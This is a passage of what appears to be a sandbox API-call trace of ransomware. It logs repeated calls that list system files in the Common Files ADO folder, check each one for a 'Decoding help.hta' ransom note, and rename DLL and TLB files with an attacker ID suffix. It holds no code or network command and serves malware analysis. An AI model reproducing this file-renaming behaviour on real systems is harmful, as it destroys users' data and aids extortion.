Files\\System\\ado\\msado21.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0050.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.244] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83410e23, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83410e23, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83410e23, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado25.tlb", cAlternateFileName="")) returned 1 [0050.244] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0050.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0050.245] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado25.tlb") returned -1 [0050.245] lstrlenW (lpString="msado25.tlb") returned 11 [0050.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msado25.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" [0050.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" [0050.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0050.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.245] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83410e23, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83410e23, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83410e23, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado26.tlb", cAlternateFileName="")) returned 1 [0050.245] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0050.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0050.245] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado26.tlb") returned -1 [0050.245] lstrlenW (lpString="msado26.tlb") returned 11 [0050.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msado26.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" [0050.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" [0050.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0050.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.205] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83436f83, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83436f83, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8345d0e3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado27.tlb", cAlternateFileName="")) returned 1 [0051.205] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.205] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.205] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado27.tlb") returned -1 [0051.205] lstrlenW (lpString="msado27.tlb") returned 11 [0051.205] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.205] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msado27.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" [0051.205] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" [0051.205] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0051.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.206] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83483244, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83483244, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83483244, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado28.tlb", cAlternateFileName="")) returned 1 [0051.206] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.206] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado28.tlb") returned -1 [0051.206] lstrlenW (lpString="msado28.tlb") returned 11 [0051.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msado28.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" [0051.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" [0051.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0051.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.206] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ec495ee, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9ec495ee, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ec6f74e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x72000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadomd.dll", cAlternateFileName="")) returned 1 [0051.206] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.206] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadomd.dll") returned -1 [0051.207] lstrlenW (lpString="msadomd.dll") returned 11 [0051.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msadomd.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" [0051.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" [0051.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0051.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.207] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62a6a67, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x62a6a67, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x625a7ad, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadomd28.tlb", cAlternateFileName="")) returned 1 [0051.207] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadomd28.tlb") returned -1 [0051.207] lstrlenW (lpString="msadomd28.tlb") returned 13 [0051.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msadomd28.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" [0051.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" [0051.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0051.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.686] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad50fa2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ad50fa2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad50fa2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msador15.dll", cAlternateFileName="")) returned 1 [0051.686] lstrcpyW (in: lpString1=0x10a18b40, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.686] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.686] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.686] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msador15.dll") returned -1 [0051.686] lstrlenW (lpString="msador15.dll") returned 12 [0051.686] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.686] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.686] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msador15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" [0051.686] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" [0051.686] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0051.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.686] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9debf8b5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9debf8b5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9dee5a15, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadox.dll", cAlternateFileName="")) returned 1 [0051.687] lstrcpyW (in: lpString1=0x10a18b40, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.687] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.687] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadox.dll") returned -1 [0051.687] lstrlenW (lpString="msadox.dll") returned 10 [0051.687] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.687] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msadox.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" [0051.687] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" [0051.687] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0051.687] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.687] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd3080, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x5fd3080, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x5f60c69, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, 